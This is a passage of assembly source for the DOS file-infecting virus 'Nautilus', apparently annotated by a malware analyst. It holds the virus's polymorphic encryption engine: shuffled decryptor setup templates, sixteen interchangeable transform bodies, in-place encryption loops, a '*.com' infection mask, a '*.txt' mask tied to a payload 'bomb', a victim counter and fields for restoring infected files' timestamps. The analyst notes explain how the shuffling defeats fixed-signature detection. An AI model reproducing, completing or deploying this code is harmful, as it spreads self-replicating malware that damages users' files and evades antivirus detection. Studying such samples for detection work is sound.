nautilus.asm
mov si,di ; 2
; = 18
; Analyst note -- outer-layer setup templates (PosCC3..PosCC8 are the ones
; visible in this part of the listing).
; Every template performs the same five loads in a different order and adds
; one single-byte filler, for 18 bytes each by the per-line counts:
;   SI = DI = bp+hidden       source and destination are the same address,
;                             so the Cryptie loop (lodsb/stosb, further
;                             down) rewrites the region in place
;   CX      = cryptie-hidden  number of bytes to process
;   DH      = [bp+Xor1val]    key byte
;   DL      = [bp+DecVal1]    key byte
; The code that selects a template and copies it is not in this chunk.
; Only the instruction order and the filler differ between templates, so a
; fixed byte string taken from one sample's setup need not match another
; sample; the set of loads is what stays constant.
; The fillers are not all inert: sti, cld, clc and stc change IF, DF or CF.
PosCC3:
sti ; 1  filler
lea si,[bp+hidden] ; 4
mov dh,[bp+Xor1val] ; 4
mov di,si ; 2
mov dl,[bp+DecVal1] ; 4
mov cx,cryptie-hidden ; 3
; = 18
PosCC4:
lea di,[bp+hidden] ; 4
mov cx,cryptie-hidden ; 3
clc ; 1  filler
mov si,di ; 2
mov dh,[bp+Xor1val] ; 4
mov dl,[bp+DecVal1] ; 4
; = 18
PosCC5:
mov dl,[bp+DecVal1] ; 4
mov dh,[bp+Xor1val] ; 4
mov cx,cryptie-hidden ; 3
lea si,[bp+hidden] ; 4
mov di,si ; 2
nop ; 1  filler
; = 18
PosCC6:
mov dh,[bp+Xor1val] ; 4
lea si,[bp+hidden] ; 4
cld ; 1  filler
mov cx,cryptie-hidden ; 3
mov di,si ; 2
mov dl,[bp+DecVal1] ; 4
; = 18
PosCC7:
mov cx,cryptie-hidden ; 3
nop ; 1  filler
mov dl,[bp+DecVal1] ; 4
mov dh,[bp+Xor1val] ; 4
lea di,[bp+hidden] ; 4
mov si,di ; 2
; = 18
PosCC8:
mov dl,[bp+DecVal1] ; 4
lea si,[bp+hidden] ; 4
mov cx,cryptie-hidden ; 3
stc ; 1  filler
mov di,si ; 2
mov dh,[bp+Xor1val] ; 4
; = 18
; Analyst note -- second-layer setup templates (PosCDC..PosCDC8, eight in
; all). Same construction as the PosCC* table, but for the DCryptie loop:
;   SI = DI = bp+Dhidden        in-place transform of the inner region
;   CX      = DCryptie-Dhidden  number of bytes to process
;   DH      = [bp+Xor2Val]      key byte
;   DL      = [bp+DecVal2]      key byte
; Each template is five loads in a shuffled order plus one single-byte
; filler (nop, clc, sti or cld), 18 bytes by the per-line counts. Which
; template ends up in a given sample is decided by code outside this chunk.
PosCDC: ; Possible Call DCryptie, size 12h ( 18d ) bytes
mov cx,DCryptie-Dhidden ; 3
lea si,[bp+Dhidden] ; 4
mov di,si ; 2
nop ; 1  filler
mov dl,[bp+DecVal2] ; 4
mov dh,[bp+Xor2Val] ; 4
; = 18
PosCDC2:
lea si,[bp+Dhidden] ; 4
mov dh,[bp+Xor2Val] ; 4
mov di,si ; 2
clc ; 1  filler
mov cx,DCryptie-Dhidden ; 3
mov dl,[bp+DecVal2] ; 4
; = 18
PosCDC3:
mov dh,[bp+Xor2Val] ; 4
mov dl,[bp+DecVal2] ; 4
lea si,[bp+Dhidden] ; 4
nop ; 1  filler
mov di,si ; 2
mov cx,DCryptie-Dhidden ; 3
; = 18
PosCDC4:
lea di,[bp+Dhidden] ; 4
sti ; 1  filler
mov dl,[bp+DecVal2] ; 4
mov si,di ; 2
mov cx,DCryptie-Dhidden ; 3
mov dh,[bp+Xor2Val] ; 4
; = 18
PosCDC5:
cld ; 1  filler
lea si,[bp+Dhidden] ; 4
mov cx,DCryptie-Dhidden ; 3
mov di,si ; 2
mov dh,[bp+Xor2Val] ; 4
mov dl,[bp+DecVal2] ; 4
; = 18
PosCDC6:
lea si,[bp+Dhidden] ; 4
mov cx,DCryptie-Dhidden ; 3
mov dl,[bp+DecVal2] ; 4
nop ; 1  filler
mov dh,[bp+Xor2Val] ; 4
mov di,si ; 2
; = 18
PosCDC7:
lea di,[bp+Dhidden] ; 4
mov cx,DCryptie-Dhidden ; 3
mov si,di ; 2
mov dh,[bp+Xor2Val] ; 4
cld ; 1  filler
mov dl,[bp+DecVal2] ; 4
; = 18
PosCDC8:
mov dh,[bp+Xor2Val] ; 4
mov dl,[bp+DecVal2] ; 4
nop ; 1  filler
lea di,[bp+Dhidden] ; 4
mov si,di ; 2
mov cx,DCryptie-Dhidden ; 3
; = 18
; Analyst note -- transform bodies, sixteen templates of 14 bytes each.
; Per the author's label comments, PosCR* are candidates for the Cryptie
; loop and Pos2CR* for the DCryptie loop; the two tables are interleaved.
; 14 bytes is the size of the `db 14 dup 90h` slot inside each loop
; (MorphD1 / MorphD2, further down). The code that fills a slot is not in
; this chunk.
;
; Register state while a body runs (from the setup templates and the
; `xchg dx,cx` that both loops execute before the slot):
;   AL = byte being transformed (loaded by lodsb, stored back by stosb)
;   CL = the DecVal byte, used here as the rotate count
;   CH = the Xor byte
;   DX = remaining byte count, parked until the second `xchg dx,cx`
;
; Every body is a mix of xor / neg / not / rol / ror on AL. Nothing in these
; templates changes CL or CH or feeds one byte's result into the next, so
; for one key pair a layer is a fixed byte-for-byte substitution.
; Bodies shorter than 14 bytes are padded with nop, flag instructions
; (sti/cld/stc/clc/std), cmp, paired xchg, or a jne to the next instruction;
; none of that padding changes AL.
PosCR: ; Possible Cryptie Routines, each 14 bytes
neg al ; 2
xor al,13h ; 2
not al ; 2
rol al,cl ; 2
not al ; 2
xor al,13h ; 2
neg al ; 2
; = 14
Pos2CR: ; Possible DCryptie Routines, each 14 bytes
xor al,72h ; 2
neg al ; 2
rol al,cl ; 2
not al ; 2
rol al,cl ; 2
neg al ; 2
xor al,72h ; 2
; = 14
PosCR2:
neg al ; 2
sti ; 1  padding
rol al,cl ; 2
nop ; 1  padding
clc ; 1  padding
neg al ; 2
rol al,cl ; 2
cld ; 1  padding
neg al ; 2
; = 14
Pos2CR2:
rol al,cl ; 2
sti ; 1  padding
xor al,0C4h ; 2
ror al,cl ; 2
stc ; 1  padding
nop ; 1  padding
xor al,0C4h ; 2
clc ; 1  padding
rol al,cl ; 2
; = 14
PosCR3:
not al ; 2
xor al,0AAh ; 2
stc ; 1  padding
nop ; 1  padding
clc ; 1  padding
neg al ; 2
xor al,0AAh ; 2
sti ; 1  padding
not al ; 2
; = 14
Pos2CR3:
ror al,cl ; 2
cmp al,cl ; 2  padding: sets flags only, result is never tested
stc ; 1  padding
xor al,ch ; 2
ror al,cl ; 2
xor al,ch ; 2
cld ; 1  padding
ror al,cl ; 2
; = 14
PosCR4:
rol al,cl ; 2
neg al ; 2
nop ; 1  padding
xor al,55h ; 2
sti ; 1  padding
neg al ; 2
std ; 1  padding: sets DF ...
rol al,cl ; 2
cld ; 1  ... and DF is cleared again before the slot ends
; = 14
Pos2CR4:
cmp al,12h ; 2  padding: compare feeds only the jne below
jne Fakejmp ; 2  padding: target is the next instruction either way
Fakejmp:
sti ; 1  padding
cld ; 1  padding
rol al,cl ; 2
nop ; 1  padding
nop ; 1  padding
xor al,ch ; 2
rol al,cl ; 2
; = 14
PosCR5:
cld ; 1  padding
ror al,cl ; 2
xor al,ch ; 2
not al ; 2
nop ; 1  padding
nop ; 1  padding
xor al,ch ; 2
nop ; 1  padding
ror al,cl ; 2
; = 14
Pos2CR5:
ror al,cl ; 2
xor al,ch ; 2
rol al,cl ; 2
not al ; 2
rol al,cl ; 2
xor al,ch ; 2
ror al,cl ; 2
; = 14
PosCR6:
xor al,ch ; 2
nop ; 1  padding
xchg bx,dx ; 2  padding: swaps BX with the parked count ...
nop ; 1  padding
nop ; 1  padding
ror al,cl ; 2
stc ; 1  padding
xor al,ch ; 2
xchg bx,dx ; 2  ... and swaps it back, so BX and DX end unchanged
; = 14
Pos2CR6:
rol al,cl ; 2
xor al,ch ; 2
nop ; 1  padding
xor al,0D8h ; 2
cmp al,4h ; 2  padding: sets flags only, result is never tested
xor al,ch ; 2
sti ; 1  padding
rol al,cl ; 2
; = 14
PosCR7:
; The only instruction here that changes AL is the first xor; the rest is
; padding.
xor al,ch ; 2
cmp al,4h ; 2  padding
jne FakeJmp2 ; 2  padding: skips one stc, nothing else
stc ; 1
FakeJmp2:
sti ; 1
stc ; 1
cld ; 1
xchg bx,ax ; 1  swaps BX/AX ...
xchg bx,ax ; 1  ... and back
stc ; 1
nop ; 1
; = 14
Pos2CR7:
rol al,cl ; 2
xor al,ch ; 2
rol al,cl ; 2
not al ; 2
rol al,cl ; 2
xor al,ch ; 2
rol al,cl ; 2
; = 14
PosCR8:
xor al,ch ; 2
rol al,cl ; 2
xor al,ch ; 2
not al ; 2
xor al,ch ; 2
rol al,cl ; 2
xor al,ch ; 2
; = 14
Pos2CR8:
xor al,ch ; 2
rol al,cl ; 2
xor al,0C7h ; 2
neg al ; 2
xor al,0C7h ; 2
rol al,cl ; 2
xor al,ch ; 2
; = 14
; Analyst note -- string and state table. Everything from here down to the
; Cryptie label lies below the upper bound (cryptie-hidden) that the PosCC*
; setups pass as the length, so if `hidden` is defined above this point
; (not visible in this chunk -- confirm) these strings are stored
; transformed in an infected file and only appear as plaintext in memory or
; in a decrypted image. String-based indicators below apply to those views.
EndMorphs:
filemask db '*.com',0 ; The type of files we are gonna infect.
textmask db '*.txt',0 ; Text files to find when bomb goes off
dos_mask db 'dos',0 ; Mask for finding DOS
win_mask db 'windows',0 ; Mask for finding Windows
win_com db 'command',0 ; Mask for finding .\windows\command
dot_dot db '..',0 ; Mask for previous directory.
saved db 0CDh,020h,0h ; This is the storage space for the first
; three bytes from the infected file. CD20 is
; the 'int 20h' instruction used to exit.
; (For remediation: per the comment above, this is where the host's original
; first three bytes are kept; the code that writes and restores them is not
; in this chunk.)
Infectedby db 'Sea4 ' ; Place to keep virus lineage
MyName db 'Nautilus.com ' ; Current infected file
; (Infectedby/MyName are space-padded and have no terminator; how they are
; updated is not shown here.)
Virus_Name db '[Nautilus]',0
Author db 'Sea4, Codebreakers',0
; textlen = bytes from line1 up to DCryptie, i.e. line1..line3 including
; their CR/LF pairs (the CR/LF EQUs below emit no bytes).
textlen EQU DCryptie-Line1
; Below is the first sentence of the Jules Verne classic from whence I got
; the name of this virus. "Twenty Thousand Leagues Under the Sea"
line1 db 'The year 1866 was made notable by a series of bizarre',CR,LF
line2 db 'events, a chain of mysterious phenomena which have never',CR,LF
line3 db 'been explained, that I am sure no one has forgotten.',CR,LF
CR EQU 0Dh
LF EQU 0Ah ; Carriage Return Line Feed ( next line )
; DCryptie -- byte loop for the inner (Dhidden..DCryptie) region.
; In:    SI = source, DI = destination, CX = byte count,
;        DL/DH = key bytes (the PosCDC* templates load all of these)
; Out:   region rewritten through stosb; CX = 0 when the loop ends
; Clobb: AL, SI, DI, flags; DX ends holding the key bytes again
; Analyst note: the frame (lodsb / xchg / 14-byte slot / xchg / stosb /
; loop / ret) is fixed in this source; only the 14 bytes at MorphD1 are
; meant to vary. This routine sits below the Cryptie label, so it appears
; to be covered by the outer layer at rest -- confirm against where
; `hidden` is defined.
DCryptie:
lodsb ; Gets next byte Doomed for De/Encryption
xchg dx,cx ; Saves the count while using the DE/ENcrypt value
           ; (after this CL/CH hold the key bytes, DX the count)
MorphD1:
db 14 dup 90h ; The encryption instructions will be at most
; 14 bytes long.
; (As assembled the slot is 14 NOPs, i.e. the byte passes through
; unchanged until something overwrites the slot.)
xchg dx,cx ; Returns the count value to CX
stosb ; Puts the encrypted byte into mem
loop DCryptie ; Does all the bytes specified by CX
ret ; Jumps back to the caller
; Key bytes for this layer. Xor2Val and DecVal2 are read by the PosCDC*
; templates; EncVal2 is not referenced anywhere in this chunk.
Xor2Val db 00h ; Xor value to be used in DCryptie
DecVal2 db 00h ; Decrypt value 2
EncVal2 db 00h ; Encrypt value 2
; Cryptie -- byte loop for the outer (hidden..cryptie) region.
; In:    SI = source, DI = destination, CX = byte count,
;        DL/DH = key bytes (the PosCC* templates load all of these)
; Out:   region rewritten through stosb; CX = 0 when the loop ends
; Clobb: AL, SI, DI, flags; DX ends holding the key bytes again
; Analyst note: the PosCC* setups use cryptie-hidden as the length, so the
; range stops where this routine begins (assuming the assembler treats
; `cryptie` and `Cryptie` as the same symbol). The routine and its key
; bytes below are therefore outside the region it transforms. The frame
; around the MorphD2 slot is fixed in this source; the 14 slot bytes and
; the three key bytes are the parts expected to differ between samples.
Cryptie:
lodsb ; Gets the next byte to De/Encrypt
xchg dx,cx ; CL/CH = key bytes, DX = parked count
MorphD2:
db 14 dup 90h ; The encryption instructions will be at most
; 14 bytes long.
xchg dx,cx ; count back into CX for the loop instruction
stosb ; Plugs AL back into mem
loop Cryptie ; Does all the bytes specified by CX
ret ; Jumps back to where it was called
; Key bytes for this layer. Xor1Val and DecVal1 are read by the PosCC*
; templates; EncVal1 is not referenced anywhere in this chunk.
Xor1Val db 00h ; Xor value to be used in Cryptie
DecVal1 db 00h ; Decrypt value 1
EncVal1 db 00h ; Encrypt value 1
; `ende` marks the end of the body; per the author's comment the fields
; below are scratch space addressed by offset and are not part of what gets
; written out. The code that uses them is not in this chunk.
ende:
; Here is a buffer specifically for file attributes/date/time/size
; It is not saved with the virus, so it doesn't actually take up mem. :)
; Just the offsets are used.
s_attr db 0h ; File attributes
s_time dw 0h ; Saved Time Last Modified
s_date dw 0h ; Saved Date Last Modified
s_size dd 0h ; Size of file ( before modification)
; NOTE(review): saved attributes and timestamps suggest the host file's
; metadata is put back after modification, which would make timestamp-based
; triage unreliable -- confirm against the infection routine.
Victems db 00h ; Place to keep count of victims
CurDIR db 64 DUP (90) ; 64 bytes, each initialised to decimal 90 (5Ah)
buffer: ; start of a further scratch area; nothing follows it in this chunk